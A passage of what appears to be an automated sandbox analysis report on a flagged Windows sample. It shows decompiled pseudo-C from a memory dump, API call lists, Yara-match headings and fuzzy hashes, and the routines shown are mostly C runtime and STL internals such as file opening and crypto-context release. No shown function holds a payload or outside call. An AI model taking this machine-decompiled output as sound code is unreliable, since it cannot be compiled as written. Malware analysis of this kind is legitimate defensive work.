                    						_t350 =  &(_t350[0x10]);
                    						 *(_t471 + 0x5c) = _t426;
                    						_t378 = _t378 - 1;
                    						 *(_t471 + 0x38) = _t378;
                    					} while (_t378 != 0);
                    					_t342 = _t463;
                    					if(_t218 == 0) {
                    						__eflags =  *(_t471 + 0x64);
                    					} else {
                    						E013D2BA0(_t471,  *((intOrPtr*)( *_t342 + 0x18))(_t471));
                    						_t439 = _t439 + 1;
                    						 *((intOrPtr*)(_t471 + 0x3c)) = _t439;
                    						continue;
                    					}
                    					break;
                    				}
                    				_t460 =  *(_t471 + 0x40);
                    				if(__eflags != 0) {
                    					_t462 =  *(_t471 + 0x18);
                    					do {
                    						_t241 =  *((intOrPtr*)(_t471 + 0x58));
                    						 *((intOrPtr*)(_t471 + 0x60)) = _t241;
                    						 *((intOrPtr*)(_t471 + 0x58)) = _t241 + 0x18;
                    						E013D2BA0( *((intOrPtr*)(_t471 + 0x60)),  *_t462 + ((0x2aaaaaab * ( *((intOrPtr*)(_t462 + 4)) -  *_t462) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(_t462 + 4)) -  *_t462) >> 0x20 >> 2) + ((0x2aaaaaab * ( *((intOrPtr*)(_t462 + 4)) -  *_t462) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(_t462 + 4)) -  *_t462) >> 0x20 >> 2)) * 2 - 3) * 8);
                    						_t256 = (0x2aaaaaab * ( *((intOrPtr*)(_t462 + 4)) -  *_t462) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(_t462 + 4)) -  *_t462) >> 0x20 >> 2);
                    						__eflags = _t256 - 1;
                    						if(_t256 > 1) {
                    							_t257 = _t256 + 0xfffffffe;
                    							 *(_t471 + 0x5c) = _t257;
                    							__eflags = _t257 - 1;
                    							if(_t257 >= 1) {
                    								_t446 = _t257 + _t257 * 2 << 3;
                    								__eflags = _t446;
                    								do {
                    									_t375 =  *_t462 + _t446;
                    									 *((intOrPtr*)( *_t342 + 0x20))(_t375, _t375 + 0x18);
                    									 *((intOrPtr*)( *_t342 + 0x20))( *((intOrPtr*)(_t471 + 0x60)),  *_t462 + _t446);
                    									_t446 = _t446 - 0x18;
                    									_t168 = _t471 + 0x5c;
                    									 *_t168 =  *(_t471 + 0x5c) - 1;
                    									__eflags =  *_t168;
                    								} while ( *_t168 != 0);
                    							}
                    							_t369 =  *_t462;
                    							 *((intOrPtr*)( *_t342 + 0x20))(_t369, _t369 + 0x18);
                    							_t444 =  *_t342;
                    							E013D2BA0( *((intOrPtr*)(_t471 + 0x60)),  *((intOrPtr*)(_t444 + 0xc))( *((intOrPtr*)(_t444 + 0x18))( *((intOrPtr*)(_t471 + 0x60)),  *_t462)));
                    						}
                    						_t462 = _t462 + 0xc;
                    						_t176 = _t471 + 0x64;
                    						 *_t176 =  *(_t471 + 0x64) - 1;
                    						__eflags =  *_t176;
                    					} while ( *_t176 != 0);
                    					_t460 =  *(_t471 + 0x40);
                    				}
                    				__eflags =  *((intOrPtr*)(_t471 + 8)) -  *((intOrPtr*)(_t471 + 0xc));
                    				_t343 =  *(_t471 + 0x10);
                    				_t356 =  >=  ? _t471 + 0xc : _t471 + 8;
                    				 *((char*)(_t471 - 4)) = 0xa;
                    				_push(_t343);
                    				_t416 =  *( >=  ? _t471 + 0xc : _t471 + 8);
                    				memset(_t343, 0, _t416 << 2);
                    				_t475 = _t474 + 0xc;
                    				__eflags = _t416;
                    				if(_t416 == 0) {
                    					_t222 = L013CDA60();
                    				} else {
                    					_t222 = E013CD9E0();
                    				}
                    				_t476 = _t475 + 4;
                    				_t344 =  *(_t471 + 0x44);
                    				 *((char*)(_t471 - 4)) = 0xb;
                    				__eflags = _t344;
                    				if(_t344 != 0) {
                    					_push( *(_t471 + 0x64));
                    					_push(_t471 + 0x2c);
                    					E013EAA10(_t344, _t460);
                    					_t480 = _t476 + 0x10;
                    					_t237 =  *(_t471 + 0x4c) - _t344 >> 6;
                    					__eflags = _t237 - 0x3ffffff;
                    					if(__eflags > 0) {
                    						_t237 = E013FDA71(_t344, 0, _t416, __eflags);
                    					}
                    					__eflags = _t237 << 6 - 0x1000;
                    					if(_t237 << 6 >= 0x1000) {
                    						__eflags = _t344 & 0x0000001f;
                    						if(__eflags != 0) {
                    							E013FDA71(_t344, 0, _t416, __eflags);
                    						}
                    						_t239 =  *(_t344 - 4);
                    						__eflags = _t239 - _t344;
                    						if(__eflags >= 0) {
                    							_t239 = E013FDA71(_t344, 0, _t416, __eflags);
                    						}
                    						_t348 = _t344 - _t239;
                    						__eflags = _t348 - 4;
                    						if(__eflags < 0) {
                    							_t239 = E013FDA71(_t348, 0, _t416, __eflags);
                    						}
                    						__eflags = _t348 - 0x23;
                    						if(__eflags > 0) {
                    							_t239 = E013FDA71(_t348, 0, _t416, __eflags);
                    						}
                    						_t344 = _t239;
                    					}
                    					_t222 = L013CDA60(_t344);
                    					_t476 = _t480 + 4;
                    				}
                    				_t345 =  *(_t471 + 0x18);
                    				__eflags = _t345;
                    				if(_t345 != 0) {
                    					_push( *(_t471 + 0x64));
                    					_push(_t471 + 0x18);
                    					E013EAAD0(_t345, _t471, _t345,  *((intOrPtr*)(_t471 + 0x1c)));
                    					_t363 =  *((intOrPtr*)(_t471 + 0x20)) - _t345;
                    					_t418 = 0x2aaaaaab * ( *((intOrPtr*)(_t471 + 0x20)) - _t345) >> 0x20 >> 1;
                    					_t228 = (0x2aaaaaab * ( *((intOrPtr*)(_t471 + 0x20)) - _t345) >> 0x20 >> 1 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(_t471 + 0x20)) - _t345) >> 0x20 >> 1);
                    					__eflags = _t228 - 0x15555555;
                    					if(__eflags > 0) {
                    						_t228 = E013FDA71(_t345, _t363, _t418, __eflags);
                    					}
                    					__eflags = _t228 + _t228 * 2 << 2 - 0x1000;
                    					if(_t228 + _t228 * 2 << 2 >= 0x1000) {
                    						__eflags = _t345 & 0x0000001f;
                    						if(__eflags != 0) {
                    							E013FDA71(_t345, _t363, _t418, __eflags);
                    						}
                    						_t231 =  *(_t345 - 4);
                    						__eflags = _t231 - _t345;
                    						if(__eflags >= 0) {
                    							_t231 = E013FDA71(_t345, _t363, _t418, __eflags);
                    						}
                    						_t347 = _t345 - _t231;
                    						__eflags = _t347 - 4;
                    						if(__eflags < 0) {
                    							_t231 = E013FDA71(_t347, _t363, _t418, __eflags);
                    						}
                    						__eflags = _t347 - 0x23;
                    						if(__eflags > 0) {
                    							_t231 = E013FDA71(_t347, _t363, _t418, __eflags);
                    						}
                    						_t345 = _t231;
                    					}
                    					_t222 = L013CDA60(_t345);
                    				}
                    				 *[fs:0x0] =  *((intOrPtr*)(_t471 - 0xc));
                    				return _t222;
                    			}
                    0x013ebe49
                    0x013ebe4d
                    0x013ebe6f
                    0x013ebe4f
                    0x013ebe5e
                    0x013ebe63
                    0x013ebe64
                    0x00000000
                    0x013ebe64
                    0x00000000
                    0x013ebe4d
                    0x013ebe71
                    0x013ebe74
                    0x013ebe7a
                    0x013ebe80
                    0x013ebe80
                    0x013ebe88
                    0x013ebe90
                    0x013ebeb1
                    0x013ebeca
                    0x013ebecc
                    0x013ebecf
                    0x013ebed1
                    0x013ebed4
                    0x013ebed7
                    0x013ebeda
                    0x013ebedf
                    0x013ebedf
                    0x013ebee2
                    0x013ebee6
                    0x013ebeef
                    0x013ebefe
                    0x013ebf01
                    0x013ebf04
                    0x013ebf04
                    0x013ebf04
                    0x013ebf04
                    0x013ebee2
                    0x013ebf0a
                    0x013ebf15
                    0x013ebf1a
                    0x013ebf2e
                    0x013ebf2e
                    0x013ebf33
                    0x013ebf36
                    0x013ebf36
                    0x013ebf36
                    0x013ebf36
                    0x013ebf40
                    0x013ebf40
                    0x013ebf49
                    0x013ebf4f
                    0x013ebf54
                    0x013ebf57
                    0x013ebf5d
                    0x013ebf5e
                    0x013ebf62
                    0x013ebf62
                    0x013ebf64
                    0x013ebf66
                    0x013ebf6f
                    0x013ebf68
                    0x013ebf68
                    0x013ebf68
                    0x013ebf74
                    0x013ebf77
                    0x013ebf7a
                    0x013ebf7e
                    0x013ebf80
                    0x013ebf82
                    0x013ebf88
                    0x013ebf8b
                    0x013ebf93
                    0x013ebf98
                    0x013ebf9b
                    0x013ebfa0
                    0x013ebfa2
                    0x013ebfa2
                    0x013ebfaa
                    0x013ebfaf
                    0x013ebfb1
                    0x013ebfb4
                    0x013ebfb6
                    0x013ebfb6
                    0x013ebfbb
                    0x013ebfbe
                    0x013ebfc0
                    0x013ebfc2
                    0x013ebfc2
                    0x013ebfc7
                    0x013ebfc9
                    0x013ebfcc
                    0x013ebfce
                    0x013ebfce
                    0x013ebfd3
                    0x013ebfd6
                    0x013ebfd8
                    0x013ebfd8
                    0x013ebfdd
                    0x013ebfdd
                    0x013ebfe0
                    0x013ebfe5
                    0x013ebfe5
                    0x013ebfe8
                    0x013ebfeb
                    0x013ebfed
                    0x013ebfef
                    0x013ebff5
                    0x013ebffa
                    0x013ec007
                    0x013ec00e
                    0x013ec015
                    0x013ec017
                    0x013ec01c
                    0x013ec01e
                    0x013ec01e
                    0x013ec029
                    0x013ec02e
                    0x013ec030
                    0x013ec033
                    0x013ec035
                    0x013ec035
                    0x013ec03a
                    0x013ec03d
                    0x013ec03f
                    0x013ec041
                    0x013ec041
                    0x013ec046
                    0x013ec048
                    0x013ec04b
                    0x013ec04d
                    0x013ec04d
                    0x013ec052
                    0x013ec055
                    0x013ec057
                    0x013ec057
                    0x013ec05c
                    0x013ec05c
                    0x013ec05f
                    0x013ec064
                    0x013ec06a
                    0x013ec079

                    APIs
                      • Part of subcall function 013EAE90: std::_Xinvalid_argument.LIBCPMT ref: 013EAEE8
                    • std::_Xinvalid_argument.LIBCPMT ref: 013EBB22
                      • Part of subcall function 013F0F81: std::invalid_argument::invalid_argument.LIBCONCRT ref: 013F0F8D
                      • Part of subcall function 013F0F81: __CxxThrowException@8.LIBVCRUNTIME ref: 013F0F9B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: Xinvalid_argumentstd::_$Exception@8Throwstd::invalid_argument::invalid_argument
                    • String ID: vector<T> too long
                    • API String ID: 1284171080-3788999226
                    • Opcode ID: 1e310602d29b832bc7bd6eb236ddbd30b77fc7e837e2c0503d60abb0b251951d
                    • Instruction ID: f40f8c34cbff8d9c9023ccdbf5d3e947146283c364e5e4fc36c3bc9fd77a701d
                    • Opcode Fuzzy Hash: 1e310602d29b832bc7bd6eb236ddbd30b77fc7e837e2c0503d60abb0b251951d
                    • Instruction Fuzzy Hash: 0212CD72A002599FDF19CF6CC984AADBBE5BF98308F184129F94697385D731ED45CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 83%
                    			E013EA3F0() {
                    				int _v8;
                    				char _v16;
                    				HCRYPTPROV* _v20;
                    				void* __ecx;
                    				void* __esi;
                    				signed int _t10;
                    				intOrPtr _t14;
                    				long** _t15;
                    				HCRYPTPROV* _t16;
                    				long* _t18;
                    				long** _t21;
                    				signed int _t26;
                    				int _t35;
                    				void* _t37;
                    				long** _t39;
                    				signed int _t41;
                    				void* _t42;
                    
                    				_push(0xffffffff);
                    				_push(E01417D1F);
                    				_push( *[fs:0x0]);
                    				_push(_t37);
                    				_t10 =  *0x1435234; // 0x78d9f939
                    				_push(_t10 ^ _t41);
                    				 *[fs:0x0] =  &_v16;
                    				_t26 =  *0x1439f68; // 0x0
                    				_t14 =  *0x1439a5c; // 0x80000001
                    				if(_t14 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c] + _t26 * 4)) + 4))) {
                    					E013F2587(0x1439a5c);
                    					_t42 = _t42 + 4;
                    					_t46 =  *0x1439a5c - 0xffffffff;
                    					if( *0x1439a5c == 0xffffffff) {
                    						 *0x1439a58 = 0;
                    						E013F243E(_t46, 0x1418bc0);
                    						E013F2548(_t37, 0x1439a5c);
                    						_t42 = _t42 + 8;
                    					}
                    				}
                    				_t15 =  *0x1439a58; // 0xaf7680
                    				_t47 = _t15;
                    				if(_t15 != 0) {
                    					L14:
                    					 *[fs:0x0] = _v16;
                    					return _t15;
                    				} else {
                    					_t16 = E013F21A5(_t47, 4);
                    					_v20 = _t16;
                    					_v8 = 0;
                    					if(_t16 == 0) {
                    						_t39 = 0;
                    						__eflags = 0;
                    					} else {
                    						_t21 = E013E9FC0(_t16); // executed
                    						_t39 = _t21;
                    					}
                    					_t35 =  *0x1439a58; // 0xaf7680
                    					if(_t35 == 0) {
                    						 *0x1439a58 = _t39;
                    						_t15 = _t39;
                    						goto L14;
                    					} else {
                    						if(_t39 != 0) {
                    							_t18 =  *_t39;
                    							if(_t18 != 0) {
                    								CryptReleaseContext(_t18, 0);
                    							}
                    							_push(4);
                    							E013F21D8(_t39);
                    						}
                    						 *[fs:0x0] = _v16;
                    						return _t35;
                    					}
                    				}
                    			}





















                    APIs
                    • new.LIBCMT ref: 013EA473
                    • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 013EA4AD
                      • Part of subcall function 013F243E: __onexit.LIBCMT ref: 013F2444
                    Yara matches
                    Similarity
                    • API ID: ContextCryptRelease__onexit
                    • String ID:
                    • API String ID: 3499210788-0
                    • Opcode ID: 1b6dba219018459dcbfeeb0b9f514cf476d9867dac1dba628853ae0c70963cbd
                    • Instruction ID: 849b643b0a9056de2809f8478129212ab2642548386901daf7b16fbdd71bece9
                    • Opcode Fuzzy Hash: 1b6dba219018459dcbfeeb0b9f514cf476d9867dac1dba628853ae0c70963cbd
                    • Instruction Fuzzy Hash: CD21E572B04395DBDB20EF1CD809B5AB7E8EB54B18F14022EEA05A7794E7B494018F90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E013EA4F0(intOrPtr* __ecx, int _a8) {
                    				char _v8;
                    				char _v16;
                    				long* _v20;
                    				char _v24;
                    				void* _v28;
                    				char _v32;
                    				char _v36;
                    				void* __edi;
                    				signed int _t22;
                    				void* _t25;
                    				long* _t29;
                    				void* _t35;
                    				void* _t38;
                    				intOrPtr* _t52;
                    				int _t57;
                    				signed int _t59;
                    				void* _t60;
                    				void* _t61;
                    
                    				_push(0xffffffff);
                    				_push(E01417D56);
                    				_push( *[fs:0x0]);
                    				_t61 = _t60 - 0x18;
                    				_t22 =  *0x1435234; // 0x78d9f939
                    				_push(_t22 ^ _t59);
                    				 *[fs:0x0] =  &_v16;
                    				_t52 = __ecx;
                    				_t57 = _a8;
                    				_v36 = 0xffffffff;
                    				_v32 = _t57;
                    				if(_t57 != 0) {
                    					_t25 = E013CD9F0(__ecx, __ecx, __eflags, _t57);
                    					_t61 = _t61 + 4;
                    					_t38 = _t25;
                    				} else {
                    					_t38 = 0;
                    				}
                    				_v28 = _t38;
                    				_v8 = 2;
                    				E013CB0B0( &_v24, 1);
                    				_v24 = 0x141ddf0;
                    				E013E9FC0( &_v20); // executed
                    				_v8 = 3;
                    				E013EA350(_t38, _t57); // executed
                    				_t29 = _v20;
                    				_v8 = 2;
                    				_v24 = 0x141ddf0;
                    				if(_t29 != 0) {
                    					CryptReleaseContext(_t29, 0);
                    				}
                    				 *((intOrPtr*)( *_t52 + 0xc))(_t38, _t57);
                    				_v8 = 4;
                    				_t46 =  <=  ?  &_v32 :  &_v36;
                    				_t47 =  *( <=  ?  &_v32 :  &_v36);
                    				memset(_t38, 0,  *( <=  ?  &_v32 :  &_v36) << 0);
                    				_t35 = L013CDA60(_t38);
                    				 *[fs:0x0] = _v16;
                    				return _t35;
                    			}






















                    APIs
                    • CryptReleaseContext.ADVAPI32(?,00000000,00000001), ref: 013EA580
                    Yara matches
                    Similarity
                    • API ID: ContextCryptRelease
                    • String ID:
                    • API String ID: 829835001-0
                    • Opcode ID: 321190534baaca3a0846c996a67b3eed8b2c9001751839a29ebb6d3760d27a42
                    • Instruction ID: 62b2aa115e6cd2196719764a6a5863945b07939235022bc06cea17b327c83976
                    • Opcode Fuzzy Hash: 321190534baaca3a0846c996a67b3eed8b2c9001751839a29ebb6d3760d27a42
                    • Instruction Fuzzy Hash: F22190B5901219EBCF10DF98D948BAEBBF8EB15768F104169E915A33C0D7345A09CBA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_00033616,013F2DBD), ref: 013F360F
                    Yara matches
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: ea1848ede3d6ceabc731451452e9cb29bad1ee52c883f1367073860e3ef2dbe8
                    • Instruction ID: 5f1a8f635dbafab2cf6a930cdb49adf1bd170b5d1cc0cbec0cf0925228a53da0
                    • Opcode Fuzzy Hash: ea1848ede3d6ceabc731451452e9cb29bad1ee52c883f1367073860e3ef2dbe8
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 41%
                    			E01411CF2(void* __ecx, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
                    				signed int _v5;
                    				char _v6;
                    				void* _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				char _v24;
                    				intOrPtr _v36;
                    				signed int _v44;
                    				void _v48;
                    				char _v72;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t114;
                    				void* _t122;
                    				signed int _t123;
                    				signed char _t124;
                    				signed int _t134;
                    				intOrPtr _t164;
                    				intOrPtr _t180;
                    				signed int* _t190;
                    				signed int _t192;
                    				char _t197;
                    				signed int _t203;
                    				signed int _t206;
                    				signed int _t215;
                    				signed int _t217;
                    				signed int _t219;
                    				signed int _t225;
                    				signed int _t227;
                    				signed int _t234;
                    				signed int _t235;
                    				signed int _t237;
                    				signed int _t239;
                    				signed char _t242;
                    				intOrPtr _t245;
                    				void* _t248;
                    				void* _t252;
                    				void* _t262;
                    				signed int _t263;
                    				signed int _t266;
                    				signed int _t269;
                    				signed int _t270;
                    				void* _t272;
                    				void* _t274;
                    				void* _t275;
                    				void* _t277;
                    				void* _t278;
                    				void* _t280;
                    				void* _t284;
                    
                    				_t262 = E01411AC6(__ecx,  &_v72, _a16, _a20, _a24);
                    				_t192 = 6;
                    				memcpy( &_v48, _t262, _t192 << 2);
                    				_t274 = _t272 + 0x1c;
                    				_t248 = _t262 + _t192 + _t192;
                    				_t263 = _t262 | 0xffffffff;
                    				if(_v36 != _t263) {
                    					_t114 = E0140DBED(_t248, _t263, __eflags);
                    					_t190 = _a8;
                    					 *_t190 = _t114;
                    					__eflags = _t114 - _t263;
                    					if(_t114 != _t263) {
                    						_v20 = _v20 & 0x00000000;
                    						_v24 = 0xc;
                    						_t275 = _t274 - 0x18;
                    						 *_a4 = 1;
                    						_push(6);
                    						_v16 =  !(_a16 >> 7) & 1;
                    						_push( &_v24);
                    						_push(_a12);
                    						memcpy(_t275,  &_v48, 1 << 2);
                    						_t197 = 0;
                    						_t122 = E01411A31(); // executed
                    						_t252 = _t122;
                    						_t277 = _t275 + 0x2c;
                    						_v12 = _t252;
                    						__eflags = _t252 - 0xffffffff;
                    						if(_t252 != 0xffffffff) {
                    							L11:
                    							_t123 = GetFileType(_t252); // executed
                    							__eflags = _t123;
                    							if(_t123 != 0) {
                    								__eflags = _t123 - 2;
                    								if(_t123 != 2) {
                    									__eflags = _t123 - 3;
                    									_t124 = _v48;
                    									if(_t123 == 3) {
                    										_t124 = _t124 | 0x00000008;
                    										__eflags = _t124;
                    									}
                    								} else {
                    									_t124 = _v48 | 0x00000040;
                    								}
                    								_v5 = _t124;
                    								E0140DB36(_t197,  *_t190, _t252);
                    								_t242 = _v5 | 0x00000001;
                    								_v5 = _t242;
                    								_v48 = _t242;
                    								 *( *((intOrPtr*)(0x143a740 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) = _t242;
                    								_t203 =  *_t190;
                    								_t205 = (_t203 & 0x0000003f) * 0x30;
                    								__eflags = _a16 & 0x00000002;
                    								 *((char*)( *((intOrPtr*)(0x143a740 + (_t203 >> 6) * 4)) + 0x29 + (_t203 & 0x0000003f) * 0x30)) = 0;
                    								if((_a16 & 0x00000002) == 0) {
                    									L20:
                    									_v6 = 0;
                    									_push( &_v6);
                    									_push(_a16);
                    									_t278 = _t277 - 0x18;
                    									_t206 = 6;
                    									_push( *_t190);
                    									memcpy(_t278,  &_v48, _t206 << 2);
                    									_t134 = E014117E4(_t190,  &_v48 + _t206 + _t206,  &_v48);
                    									_t280 = _t278 + 0x30;
                    									__eflags = _t134;
                    									if(__eflags == 0) {
                    										 *((char*)( *((intOrPtr*)(0x143a740 + ( *_t190 >> 6) * 4)) + 0x29 + ( *_t190 & 0x0000003f) * 0x30)) = _v6;
                    										 *( *((intOrPtr*)(0x143a740 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x143a740 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0x143a740 + ( *_t190 >> 6) * 4)) + 0x2d + ( *_t190 & 0x0000003f) * 0x30)) & 0x00000001;
                    										__eflags = _v5 & 0x00000048;
                    										if((_v5 & 0x00000048) == 0) {
                    											__eflags = _a16 & 0x00000008;
                    											if((_a16 & 0x00000008) != 0) {
                    												_t225 =  *_t190;
                    												_t227 = (_t225 & 0x0000003f) * 0x30;
                    												_t164 =  *((intOrPtr*)(0x143a740 + (_t225 >> 6) * 4));
                    												_t87 = _t164 + _t227 + 0x28;
                    												 *_t87 =  *(_t164 + _t227 + 0x28) | 0x00000020;
                    												__eflags =  *_t87;
                    											}
                    										}
                    										_t266 = _v44;
                    										__eflags = (_t266 & 0xc0000000) - 0xc0000000;
                    										if((_t266 & 0xc0000000) != 0xc0000000) {
                    											L31:
                    											__eflags = 0;
                    											return 0;
                    										} else {
                    											__eflags = _a16 & 0x00000001;
                    											if((_a16 & 0x00000001) == 0) {
                    												goto L31;
                    											}
                    											CloseHandle(_v12);
                    											_v44 = _t266 & 0x7fffffff;
                    											_t215 = 6;
                    											_push( &_v24);
                    											_push(_a12);
                    											memcpy(_t280 - 0x18,  &_v48, _t215 << 2);
                    											_t245 = E01411A31();
                    											__eflags = _t245 - 0xffffffff;
                    											if(_t245 != 0xffffffff) {
                    												_t217 =  *_t190;
                    												_t219 = (_t217 & 0x0000003f) * 0x30;
                    												__eflags = _t219;
                    												 *((intOrPtr*)( *((intOrPtr*)(0x143a740 + (_t217 >> 6) * 4)) + _t219 + 0x18)) = _t245;
                    												goto L31;
                    											}
                    											E013FDB04(GetLastError());
                    											 *( *((intOrPtr*)(0x143a740 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x143a740 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                    											E0140DCFF( *_t190);
                    											L10:
                    											goto L2;
                    										}
                    									}
                    									_t269 = _t134;
                    									goto L22;
                    								} else {
                    									_t269 = E01411C42(_t205,  *_t190);
                    									__eflags = _t269;
                    									if(__eflags != 0) {
                    										L22:
                    										E014077EC(__eflags,  *_t190);
                    										return _t269;
                    									}
                    									goto L20;
                    								}
                    							}
                    							_t270 = GetLastError();
                    							E013FDB04(_t270);
                    							 *( *((intOrPtr*)(0x143a740 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0x143a740 + ( *_t190 >> 6) * 4)) + 0x28 + ( *_t190 & 0x0000003f) * 0x30) & 0x000000fe;
                    							CloseHandle(_t252);
                    							__eflags = _t270;
                    							if(_t270 == 0) {
                    								 *((intOrPtr*)(E013FDB3A())) = 0xd;
                    							}
                    							goto L2;
                    						}
                    						_t234 = _v44;
                    						__eflags = (_t234 & 0xc0000000) - 0xc0000000;
                    						if((_t234 & 0xc0000000) != 0xc0000000) {
                    							L9:
                    							_t235 =  *_t190;
                    							_t237 = (_t235 & 0x0000003f) * 0x30;
                    							_t180 =  *((intOrPtr*)(0x143a740 + (_t235 >> 6) * 4));
                    							_t33 = _t180 + _t237 + 0x28;
                    							 *_t33 =  *(_t180 + _t237 + 0x28) & 0x000000fe;
                    							__eflags =  *_t33;
                    							E013FDB04(GetLastError());
                    							goto L10;
                    						}
                    						__eflags = _a16 & 0x00000001;
                    						if((_a16 & 0x00000001) == 0) {
                    							goto L9;
                    						}
                    						_t284 = _t277 - 0x18;
                    						_v44 = _t234 & 0x7fffffff;
                    						_t239 = 6;
                    						_push( &_v24);
                    						_push(_a12);
                    						memcpy(_t284,  &_v48, _t239 << 2);
                    						_t197 = 0;
                    						_t252 = E01411A31();
                    						_t277 = _t284 + 0x2c;
                    						_v12 = _t252;
                    						__eflags = _t252 - 0xffffffff;
                    						if(_t252 != 0xffffffff) {
                    							goto L11;
                    						}
                    						goto L9;
                    					} else {
                    						 *(E013FDB27()) =  *_t186 & 0x00000000;
                    						 *_t190 = _t263;
                    						 *((intOrPtr*)(E013FDB3A())) = 0x18;
                    						goto L2;
                    					}
                    				} else {
                    					 *(E013FDB27()) =  *_t188 & 0x00000000;
                    					 *_a8 = _t263;
                    					L2:
                    					return  *((intOrPtr*)(E013FDB3A()));
                    				}
                    			}


                    APIs
                      • Part of subcall function 01411A31: CreateFileW.KERNEL32(00000000,00000000,?,01411D9B,?,?,00000000,?,01411D9B,00000000,0000000C), ref: 01411A4E
                    • GetLastError.KERNEL32 ref: 01411E06
                    • __dosmaperr.LIBCMT ref: 01411E0D
                    • GetFileType.KERNEL32(00000000), ref: 01411E19
                    • GetLastError.KERNEL32 ref: 01411E23
                    • __dosmaperr.LIBCMT ref: 01411E2C
                    • CloseHandle.KERNEL32(00000000), ref: 01411E4C
                    • CloseHandle.KERNEL32(?), ref: 01411F96
                    • GetLastError.KERNEL32 ref: 01411FC8
                    • __dosmaperr.LIBCMT ref: 01411FCF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.471010691.00000000013C1000.00000020.00020000.sdmp, Offset: 013C0000, based on PE: true
                    • Associated: 00000000.00000002.470996422.00000000013C0000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471134411.000000000141A000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471322091.0000000001435000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471355708.0000000001436000.00000008.00020000.sdmp
                    • Associated: 00000000.00000002.471404724.0000000001438000.00000004.00020000.sdmp
                    • Associated: 00000000.00000002.471435409.000000000143B000.00000002.00020000.sdmp
                    • Associated: 00000000.00000002.471459564.000000000143D000.00000002.00020000.sdmp
                    Yara matches
                    Similarity
                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                    • String ID: H
                    • API String ID: 4237864984-2852464175
                    • Opcode ID: dc338be2c7b262fece95d4bf88bc06c4001e341de411fea067b3d88815970ae8
                    • Instruction ID: 1bbbaa64f16d8422e607ec9b786e6010cc9e20f8d1677a705d767fbfefd21489
                    • Opcode Fuzzy Hash: dc338be2c7b262fece95d4bf88bc06c4001e341de411fea067b3d88815970ae8
                    • Instruction Fuzzy Hash: DBA15732A101498FDF1A9FBCD891BAE7BB1AB06320F24015EE901DF3A5D7359813C751
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 77%
                    			E01410D3E(signed int _a4, void* _a8, unsigned int _a12) {
                    				signed int _v5;
                    				char _v6;
                    				void* _v12;
                    				unsigned int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				void* _v32;
                    				long _v36;
                    				void* _v40;
                    				long _v44;
                    				signed int* _t143;
                    				signed int _t145;
                    				intOrPtr _t149;
                    				signed int _t153;
                    				signed int _t155;
                    				signed char _t157;
                    				unsigned int _t158;
                    				intOrPtr _t162;
                    				void* _t163;
                    				signed int _t164;
                    				signed int _t167;
                    				long _t168;
                    				intOrPtr _t175;
                    				signed int _t176;
                    				intOrPtr _t178;
                    				signed int _t180;
                    				signed int _t184;
                    				char _t191;
                    				char* _t192;
                    				char _t199;
                    				char* _t200;
                    				signed char _t211;
                    				signed int _t213;
                    				long _t215;
                    				signed int _t216;
                    				char _t218;
                    				signed char _t222;
                    				signed int _t223;
                    				unsigned int _t224;
                    				intOrPtr _t225;
                    				unsigned int _t229;
                    				signed int _t231;
                    				signed int _t232;
                    				signed int _t233;
                    				signed int _t234;
                    				signed int _t235;
                    				signed char _t236;
                    				signed int _t237;
                    				signed int _t239;
                    				signed int _t240;
                    				signed int _t241;
                    				signed int _t242;
                    				signed int _t246;
                    				void* _t248;
                    				void* _t249;
                    
                    				_t213 = _a4;
                    				if(_t213 != 0xfffffffe) {
                    					__eflags = _t213;
                    					if(_t213 < 0) {
                    						L58:
                    						_t143 = E013FDB27();
